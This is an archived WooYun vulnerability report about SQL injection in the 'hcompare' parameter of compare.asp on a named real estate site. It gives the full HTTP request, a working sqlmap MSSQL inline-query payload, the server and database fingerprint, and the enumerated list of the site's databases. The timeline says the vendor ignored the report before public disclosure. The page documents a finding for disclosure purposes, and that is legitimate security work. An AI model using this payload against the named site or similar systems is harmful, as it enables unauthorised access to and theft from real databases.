乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
POST /lp/compare.asp HTTP/1.1Content-Length: 219Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDASRBBASQ=BKLNFEAAIHDDGGKFKLIIPFBMHost: house.e23.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*hcompare=1&ob=http://house.e23.cn/lp/list.asp%3fob%3d1
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:---Parameter: hcompare (POST) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: hcompare=(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2506=2506) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113))&ob=http://house.e23.cn/lp/list.asp?ob=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000available databases [18]:[*] fangchan[*] fangtan[*] fangtannew[*] jiaju[*] kfccs[*] master[*] model[*] msdb[*] MSRM2[*] NewPublish[*] newszt[*] Northwind[*] peixun[*] pubs[*] ReviewForJiNan[*] shiping[*] tempdb[*] tvvtvdata
危害等级:无影响厂商忽略
忽略时间:2016-01-23 09:50
漏洞Rank:4 (WooYun评价)
暂无